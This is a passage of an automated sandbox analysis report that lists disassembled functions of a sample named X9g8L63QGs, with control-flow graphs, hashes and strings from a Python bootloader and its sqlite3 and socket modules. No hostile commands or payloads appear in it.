7ffb0c1a5cbb-7ffb0c1a5cd3 00007FFB2ADB6A30 1207->1210 1208->1166 1210->1206 1213 7ffb0c1a5cd9-7ffb0c1a5cf1 00007FFB2ADB6A30 1210->1213 1213->1193 1213->1206
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007
                                                                                                                                                                                                                                                                    • String ID: Base Connection.__init__ not called.$Cannot operate on a closed database.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$You can only execute one statement at a time.$delete$insert$query string is too large$replace$sqlite3.Connection$the query contains a null character$update
                                                                                                                                                                                                                                                                    • API String ID: 3568877910-3639599724
                                                                                                                                                                                                                                                                    • Opcode ID: b9bba2aaab375b320d546afff25e4fe72f3c337283b4a5003dc1a0bb2f7215b2
                                                                                                                                                                                                                                                                    • Instruction ID: 0fadb10f7b582f9ad67b59cb6130a2b85721bccd39f8ac8c7680f55cb21dccd8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9bba2aaab375b320d546afff25e4fe72f3c337283b4a5003dc1a0bb2f7215b2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF91A1E1A0CA4396FB609F76E84CA792362FF45B95F0440B6D94E47AA4DF3CE54AC700
                                                                                                                                                                                                                                                                    Function 00007FFB0C1A4640 Relevance: 23.3, APIs: 3, Strings: 10, Instructions: 582COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007$C058$F805
                                                                                                                                                                                                                                                                    • String ID: BEGIN $Base Connection.__init__ not called.$Base Cursor.__init__ not called.$Cannot operate on a closed cursor.$Cannot operate on a closed database.$Error while building row_cast_map$Recursive use of cursors not allowed.$SQLite objects created in a thread can only be used in that same thread. The object was created in thread id %lu and this is thread id %lu.$e$executemany() can only execute DML statements.
                                                                                                                                                                                                                                                                    • API String ID: 3171314635-3920904728
                                                                                                                                                                                                                                                                    • Opcode ID: 0176b2ba6c81c25440ba17478a17d083e2d327909e94508213edd427639fa4a3
                                                                                                                                                                                                                                                                    • Instruction ID: 9fcb9b04bf8e52c8cf47b1c8f02f462aba9297f5652d53a32e34452dba78e4d3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0176b2ba6c81c25440ba17478a17d083e2d327909e94508213edd427639fa4a3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B94254F6A09A4286EB648F75E45CA3833A0FF85B95F1450B1CA4E477A4DF7DE886C700
                                                                                                                                                                                                                                                                    Function 00007FF7C2661950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1524 7ff7c2661950-7ff7c266198b call 7ff7c26645b0 1527 7ff7c2661c4e-7ff7c2661c72 call 7ff7c266c5c0 1524->1527 1528 7ff7c2661991-7ff7c26619d1 call 7ff7c2667f80 1524->1528 1533 7ff7c2661c3b-7ff7c2661c3e call 7ff7c26700bc 1528->1533 1534 7ff7c26619d7-7ff7c26619e7 call 7ff7c2670744 1528->1534 1537 7ff7c2661c43-7ff7c2661c4b 1533->1537 1539 7ff7c2661a08-7ff7c2661a24 call 7ff7c267040c 1534->1539 1540 7ff7c26619e9-7ff7c2661a03 call 7ff7c2674f78 call 7ff7c2662910 1534->1540 1537->1527 1546 7ff7c2661a26-7ff7c2661a40 call 7ff7c2674f78 call 7ff7c2662910 1539->1546 1547 7ff7c2661a45-7ff7c2661a5a call 7ff7c2674f98 1539->1547 1540->1533 1546->1533 1553 7ff7c2661a5c-7ff7c2661a76 call 7ff7c2674f78 call 7ff7c2662910 1547->1553 1554 7ff7c2661a7b-7ff7c2661afc call 7ff7c2661c80 * 2 call 7ff7c2670744 1547->1554 1553->1533 1566 7ff7c2661b01-7ff7c2661b14 call 7ff7c2674fb4 1554->1566 1569 7ff7c2661b16-7ff7c2661b30 call 7ff7c2674f78 call 7ff7c2662910 1566->1569 1570 7ff7c2661b35-7ff7c2661b4e call 7ff7c267040c 1566->1570 1569->1533 1576 7ff7c2661b50-7ff7c2661b6a call 7ff7c2674f78 call 7ff7c2662910 1570->1576 1577 7ff7c2661b6f-7ff7c2661b8b call 7ff7c2670180 1570->1577 1576->1533 1584 7ff7c2661b9e-7ff7c2661bac 1577->1584 1585 7ff7c2661b8d-7ff7c2661b99 call 7ff7c2662710 1577->1585 1584->1533 1586 7ff7c2661bb2-7ff7c2661bb9 1584->1586 1585->1533 1590 7ff7c2661bc1-7ff7c2661bc7 1586->1590 1591 7ff7c2661bc9-7ff7c2661bd6 1590->1591 1592 7ff7c2661be0-7ff7c2661bef 1590->1592 1593 7ff7c2661bf1-7ff7c2661bfa 1591->1593 1592->1592 1592->1593 1594 7ff7c2661bfc-7ff7c2661bff 1593->1594 1595 7ff7c2661c0f 1593->1595 1594->1595 1596 7ff7c2661c01-7ff7c2661c04 1594->1596 1597 7ff7c2661c11-7ff7c2661c24 1595->1597 1596->1595 1598 7ff7c2661c06-7ff7c2661c09 1596->1598 1599 7ff7c2661c2d-7ff7c2661c39 1597->1599 1600 7ff7c2661c26 1597->1600 1598->1595 1601 7ff7c2661c0b-7ff7c2661c0d 1598->1601 1599->1533 1599->1590 1600->1599 1601->1597
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2667F80: _fread_nolock.LIBCMT ref: 00007FF7C266802A
                                                                                                                                                                                                                                                                    • _fread_nolock.LIBCMT ref: 00007FF7C2661A1B
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7C2661B6A), ref: 00007FF7C266295E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                    • Opcode ID: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
                                                                                                                                                                                                                                                                    • Instruction ID: 52920b5d223a19b39f35807706df03c52955b73872152158b9657cff46872b77
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abc02df14881b8553accab44fb79ef53eaa7c88a432e732f5ead529d710b0ae2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF818071A08A82C5E720BF28D0442B9A3B2EB847A4F844431D9CDA7F85DEBCE545C774
                                                                                                                                                                                                                                                                    Function 00007FFB1BA45AFC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 234networkCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1602 7ffb1ba45afc-7ffb1ba45b4d call 7ffb1ba493d0 1605 7ffb1ba45b5b-7ffb1ba45b80 call 7ffb1ba49340 1602->1605 1606 7ffb1ba45b4f-7ffb1ba45b59 1602->1606 1613 7ffb1ba45b82-7ffb1ba45b85 1605->1613 1614 7ffb1ba45bd6 1605->1614 1606->1605 1607 7ffb1ba45b9b-7ffb1ba45ba9 1606->1607 1610 7ffb1ba45d6e-7ffb1ba45d7e call 7ffb1ba49510 1607->1610 1611 7ffb1ba45baf-7ffb1ba45bb7 1607->1611 1625 7ffb1ba45dab-7ffb1ba45dda call 7ffb1ba437dc getsockname 1610->1625 1626 7ffb1ba45d80-7ffb1ba45d89 call 7ffb1ba49560 1610->1626 1615 7ffb1ba45bff-7ffb1ba45c08 1611->1615 1616 7ffb1ba45bb9-7ffb1ba45bd0 call 7ffb1ba494a0 1611->1616 1619 7ffb1ba45b8b-7ffb1ba45b95 1613->1619 1620 7ffb1ba45e46-7ffb1ba45e9c call 7ffb1ba49548 WSASocketW call 7ffb1ba49468 1613->1620 1622 7ffb1ba45bdb-7ffb1ba45bfe call 7ffb1ba42a00 1614->1622 1617 7ffb1ba45c10-7ffb1ba45c61 1615->1617 1616->1614 1617->1617 1624 7ffb1ba45c63-7ffb1ba45cd6 call 7ffb1ba49340 1617->1624 1619->1607 1619->1620 1641 7ffb1ba45ea2-7ffb1ba45ea9 1620->1641 1624->1614 1639 7ffb1ba45cdc-7ffb1ba45d1e call 7ffb1ba49548 WSASocketW call 7ffb1ba49468 1624->1639 1637 7ffb1ba45ddc-7ffb1ba45ddf 1625->1637 1638 7ffb1ba45de8-7ffb1ba45deb 1625->1638 1626->1614 1640 7ffb1ba45d8f-7ffb1ba45da6 call 7ffb1ba494d8 1626->1640 1642 7ffb1ba45e02-7ffb1ba45e06 1637->1642 1643 7ffb1ba45de1-7ffb1ba45de6 1637->1643 1644 7ffb1ba45df1-7ffb1ba45dfc WSAGetLastError 1638->1644 1645 7ffb1ba45d20-7ffb1ba45d25 call 7ffb1ba44a88 1638->1645 1639->1645 1662 7ffb1ba45d2a-7ffb1ba45d3a SetHandleInformation 1639->1662 1640->1614 1641->1645 1648 7ffb1ba45eaf-7ffb1ba45ecd call 7ffb1ba44420 1641->1648 1649 7ffb1ba45e41-7ffb1ba45e44 1642->1649 1650 7ffb1ba45e08-7ffb1ba45e36 getsockopt 1642->1650 1643->1642 1644->1642 1644->1645 1645->1614 1659 7ffb1ba45d44-7ffb1ba45d4d closesocket 1648->1659 1660 7ffb1ba45ed3-7ffb1ba45ed5 1648->1660 1649->1648 1650->1645 1655 7ffb1ba45e3c 1650->1655 1655->1649 1659->1614 1660->1622 1663 7ffb1ba45d3c-7ffb1ba45d3e call 7ffb1ba49530 1662->1663 1664 7ffb1ba45d52-7ffb1ba45d69 1662->1664 1663->1659 1664->1648
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Socket$ErrorHandleInformationLastclosesocketgetsocknamegetsockopt
                                                                                                                                                                                                                                                                    • String ID: Oiii$negative file descriptor$socket descriptor string has wrong size, should be %zu bytes.$socket.__new__
                                                                                                                                                                                                                                                                    • API String ID: 141981615-2881308447
                                                                                                                                                                                                                                                                    • Opcode ID: f73766ff8fedae8d8420963e7f73361c1de4a50eb99ef0dba8f0394bee6a9da3
                                                                                                                                                                                                                                                                    • Instruction ID: 9930c6d19dc6c3c9b220c5ec0f76afcdd422a0cca2dafbc646b6a160690ea1d5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f73766ff8fedae8d8420963e7f73361c1de4a50eb99ef0dba8f0394bee6a9da3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB1A6A2E18E8582E6148F35D4042B97361FB95BB4F18A335DE9D13AB1EF3CE595C700
                                                                                                                                                                                                                                                                    Function 00007FFB1BA4718C Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 260COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 1666 7ffb1ba4718c-7ffb1ba47230 call 7ffb1ba494a8 1669 7ffb1ba4754e 1666->1669 1670 7ffb1ba47236-7ffb1ba47241 1666->1670 1673 7ffb1ba47550-7ffb1ba47570 1669->1673 1671 7ffb1ba47243-7ffb1ba47246 1670->1671 1672 7ffb1ba47248-7ffb1ba47256 1670->1672 1674 7ffb1ba47291-7ffb1ba472a0 1671->1674 1675 7ffb1ba4727a-7ffb1ba4727e 1672->1675 1676 7ffb1ba47258-7ffb1ba4726e call 7ffb1ba495b0 1672->1676 1679 7ffb1ba472bc-7ffb1ba472c6 1674->1679 1680 7ffb1ba472a2-7ffb1ba472b1 call 7ffb1ba493f8 1674->1680 1677 7ffb1ba47284-7ffb1ba4728a call 7ffb1ba49568 1675->1677 1678 7ffb1ba47537-7ffb1ba47548 call 7ffb1ba494d8 1675->1678 1676->1669 1693 7ffb1ba47274-7ffb1ba47278 1676->1693 1694 7ffb1ba4728d 1677->1694 1678->1669 1685 7ffb1ba472c8 1679->1685 1686 7ffb1ba472e7-7ffb1ba472eb 1679->1686 1698 7ffb1ba474f4-7ffb1ba474f7 1680->1698 1699 7ffb1ba472b7-7ffb1ba472ba 1680->1699 1692 7ffb1ba472cb-7ffb1ba472d7 call 7ffb1ba49328 1685->1692 1688 7ffb1ba472ed-7ffb1ba472f1 1686->1688 1689 7ffb1ba472f3-7ffb1ba472fa 1686->1689 1695 7ffb1ba47303-7ffb1ba47331 call 7ffb1ba49340 1688->1695 1696 7ffb1ba474dd-7ffb1ba474ee call 7ffb1ba494d8 1689->1696 1697 7ffb1ba47300 1689->1697 1692->1698 1710 7ffb1ba472dd-7ffb1ba472e5 1692->1710 1693->1694 1694->1674 1695->1669 1713 7ffb1ba47337-7ffb1ba47382 call 7ffb1ba49548 getaddrinfo call 7ffb1ba49468 1695->1713 1696->1698 1697->1695 1703 7ffb1ba4750d-7ffb1ba47510 1698->1703 1704 7ffb1ba474f9-7ffb1ba474fc 1698->1704 1699->1692 1706 7ffb1ba47512-7ffb1ba47515 1703->1706 1707 7ffb1ba47526-7ffb1ba4752d 1703->1707 1704->1703 1709 7ffb1ba474fe-7ffb1ba47502 1704->1709 1706->1707 1712 7ffb1ba47517-7ffb1ba4751b 1706->1712 1707->1669 1714 7ffb1ba4752f-7ffb1ba47535 FreeAddrInfoW 1707->1714 1709->1703 1711 7ffb1ba47504-7ffb1ba47507 call 7ffb1ba492e8 1709->1711 1710->1695 1711->1703 1712->1707 1716 7ffb1ba4751d-7ffb1ba47520 call 7ffb1ba492e8 1712->1716 1721 7ffb1ba47388-7ffb1ba4738b 1713->1721 1714->1669 1716->1707 1722 7ffb1ba4738d-7ffb1ba4739d call 7ffb1ba44abc 1721->1722 1723 7ffb1ba473a2-7ffb1ba473b0 call 7ffb1ba49348 1721->1723 1722->1698 1723->1698 1728 7ffb1ba473b6-7ffb1ba473bd 1723->1728 1729 7ffb1ba473c3-7ffb1ba473da call 7ffb1ba44864 1728->1729 1730 7ffb1ba4746a-7ffb1ba4746d 1728->1730 1740 7ffb1ba473e0-7ffb1ba4741d call 7ffb1ba49580 1729->1740 1741 7ffb1ba474c6-7ffb1ba474ca 1729->1741 1732 7ffb1ba4746f-7ffb1ba47472 1730->1732 1733 7ffb1ba47483-7ffb1ba47486 1730->1733 1732->1733 1735 7ffb1ba47474-7ffb1ba47478 1732->1735 1736 7ffb1ba4749c-7ffb1ba474a3 1733->1736 1737 7ffb1ba47488-7ffb1ba4748b 1733->1737 1735->1733 1742 7ffb1ba4747a-7ffb1ba4747d call 7ffb1ba492e8 1735->1742 1738 7ffb1ba474ab-7ffb1ba474ae 1736->1738 1739 7ffb1ba474a5 FreeAddrInfoW 1736->1739 1737->1736 1743 7ffb1ba4748d-7ffb1ba47491 1737->1743 1738->1673 1739->1738 1751 7ffb1ba4742f-7ffb1ba47432 1740->1751 1752 7ffb1ba4741f-7ffb1ba47424 1740->1752 1741->1698 1745 7ffb1ba474cc-7ffb1ba474d0 1741->1745 1742->1733 1743->1736 1747 7ffb1ba47493-7ffb1ba47496 call 7ffb1ba492e8 1743->1747 1745->1698 1749 7ffb1ba474d2-7ffb1ba474db call 7ffb1ba492e8 1745->1749 1747->1736 1749->1698 1751->1741 1756 7ffb1ba47438-7ffb1ba47448 call 7ffb1ba49368 1751->1756 1752->1751 1754 7ffb1ba47426-7ffb1ba47429 call 7ffb1ba492e8 1752->1754 1754->1751 1760 7ffb1ba474b3-7ffb1ba474b5 1756->1760 1761 7ffb1ba4744a-7ffb1ba4744c 1756->1761 1760->1741 1764 7ffb1ba474b7-7ffb1ba474bb 1760->1764 1762 7ffb1ba4744e-7ffb1ba47452 1761->1762 1763 7ffb1ba4745d-7ffb1ba47464 1761->1763 1762->1763 1765 7ffb1ba47454-7ffb1ba47457 call 7ffb1ba492e8 1762->1765 1763->1729 1763->1730 1764->1741 1766 7ffb1ba474bd-7ffb1ba474c0 call 7ffb1ba492e8 1764->1766 1765->1763 1766->1741
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddrFreeInfo$getaddrinfo
                                                                                                                                                                                                                                                                    • String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
                                                                                                                                                                                                                                                                    • API String ID: 2288433384-1074899869
                                                                                                                                                                                                                                                                    • Opcode ID: 63f66e3a477a56477b6af0f125f3a74155b83d1ef738e198483645070b047c49
                                                                                                                                                                                                                                                                    • Instruction ID: f4d18b23a1cf495ca48aa3e76aea62711cd2b7eec8feafc2b4e0fb7559b95203
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63f66e3a477a56477b6af0f125f3a74155b83d1ef738e198483645070b047c49
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14C140B2B29E828AEB58CF31D4445B83BA6FB44BA4F08A635DE4D52764DF3CE554C700
                                                                                                                                                                                                                                                                    Function 00007FF7C2661470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                    • Opcode ID: 04b243870eaa5c32a21b3d253070710121dc7759fdc345f161b4ef5edbe2d9a9
                                                                                                                                                                                                                                                                    • Instruction ID: 74630ec983ff8b59630089cc6483ce3fa238ccc11d678c6f5ce9123bb77f3583
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04b243870eaa5c32a21b3d253070710121dc7759fdc345f161b4ef5edbe2d9a9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2418061A08A4285EB10FF25A4005B9E3A2AF44BA4FC44532ED8D67F95DFBCE541C738
                                                                                                                                                                                                                                                                    Function 00007FFB0C0A43D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 2276 7ffb0c0a43d0-7ffb0c0a4494 call 7ffb0c0a40d0 2279 7ffb0c0a4846-7ffb0c0a4849 2276->2279 2280 7ffb0c0a449a-7ffb0c0a44b8 2276->2280 2283 7ffb0c0a4853-7ffb0c0a4856 call 7ffb0c026c40 2279->2283 2284 7ffb0c0a484b-7ffb0c0a4851 2279->2284 2281 7ffb0c0a44ba-7ffb0c0a44cd 2280->2281 2282 7ffb0c0a44d2-7ffb0c0a44d6 2280->2282 2285 7ffb0c0a486f-7ffb0c0a488e call 7ffb0c152900 2281->2285 2286 7ffb0c0a44e6-7ffb0c0a44f2 2282->2286 2287 7ffb0c0a44d8-7ffb0c0a44df 2282->2287 2288 7ffb0c0a485b-7ffb0c0a4861 call 7ffb0c081280 2283->2288 2284->2283 2284->2288 2291 7ffb0c0a44f4-7ffb0c0a44f8 2286->2291 2292 7ffb0c0a44fe-7ffb0c0a4502 2286->2292 2287->2286 2290 7ffb0c0a44e1 call 7ffb0c03fef0 2287->2290 2299 7ffb0c0a4866-7ffb0c0a4868 2288->2299 2290->2286 2291->2292 2296 7ffb0c0a457b-7ffb0c0a4586 2291->2296 2297 7ffb0c0a4504-7ffb0c0a4508 2292->2297 2298 7ffb0c0a450a-7ffb0c0a450f call 7ffb0c043790 2292->2298 2303 7ffb0c0a4590-7ffb0c0a45a7 call 7ffb0c04d660 2296->2303 2297->2298 2301 7ffb0c0a4578 2297->2301 2304 7ffb0c0a4514-7ffb0c0a4518 2298->2304 2299->2285 2301->2296 2309 7ffb0c0a45a9-7ffb0c0a45b1 2303->2309 2304->2301 2306 7ffb0c0a451a-7ffb0c0a4527 call 7ffb0c0e2850 2304->2306 2313 7ffb0c0a4529 2306->2313 2314 7ffb0c0a455e-7ffb0c0a4565 2306->2314 2310 7ffb0c0a45b3-7ffb0c0a45bc 2309->2310 2311 7ffb0c0a45be 2309->2311 2315 7ffb0c0a45c1-7ffb0c0a45cf 2310->2315 2311->2315 2316 7ffb0c0a4530-7ffb0c0a4539 2313->2316 2319 7ffb0c0a4567-7ffb0c0a456a call 7ffb0c026400 2314->2319 2320 7ffb0c0a456f-7ffb0c0a4573 2314->2320 2317 7ffb0c0a4685 2315->2317 2318 7ffb0c0a45d5-7ffb0c0a45d8 2315->2318 2316->2316 2321 7ffb0c0a453b-7ffb0c0a454d call 7ffb0c026880 2316->2321 2324 7ffb0c0a468a-7ffb0c0a469d 2317->2324 2322 7ffb0c0a4615-7ffb0c0a461b 2318->2322 2323 7ffb0c0a45da-7ffb0c0a45df 2318->2323 2319->2320 2326 7ffb0c0a4829-7ffb0c0a4831 2320->2326 2321->2314 2346 7ffb0c0a454f-7ffb0c0a4559 00007FFB1C263010 2321->2346 2322->2317 2333 7ffb0c0a461d-7ffb0c0a4630 call 7ffb0c026880 2322->2333 2323->2322 2330 7ffb0c0a45e1-7ffb0c0a45f6 2323->2330 2331 7ffb0c0a46d3-7ffb0c0a46e6 2324->2331 2332 7ffb0c0a469f-7ffb0c0a46a4 2324->2332 2327 7ffb0c0a4833-7ffb0c0a4837 2326->2327 2328 7ffb0c0a483e-7ffb0c0a4844 2326->2328 2327->2328 